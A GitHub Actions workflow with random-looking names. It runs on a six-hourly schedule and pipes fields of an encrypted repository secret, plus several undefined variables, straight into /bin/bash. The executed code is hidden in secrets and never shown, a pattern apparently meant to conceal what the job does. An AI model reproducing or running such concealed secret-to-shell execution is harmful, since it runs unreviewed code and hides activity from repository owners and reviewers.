name: songguanxingyi
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'
jobs:  # 28029
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songguanxingyi
        env:
          seloh9624: ${{ secrets.seloh9624 }}
        run: |
          echo $seloh9624 | jq -r .go27 | /bin/bash
          echo $fhi58 | jq -r .kwgp2 | /bin/bash
          echo $smajn5768 | jq -r .qkde63 | /bin/bash
          echo $sle0 | jq -r .zbwj1522 | /bin/bash
          echo $bkh46771 | jq -r .ey7728 | /bin/bash
          echo $nmibl68379 | jq -r .n4788 | /bin/bash
          echo $qo2825 | jq -r .dkgws547 | /bin/bash
          echo $iarea99137 | jq -r .i055 | /bin/bash
          echo $pm0716 | jq -r .fqk5649 | /bin/bash
          echo $grr01671 | jq -r .twemr30 | /bin/bash

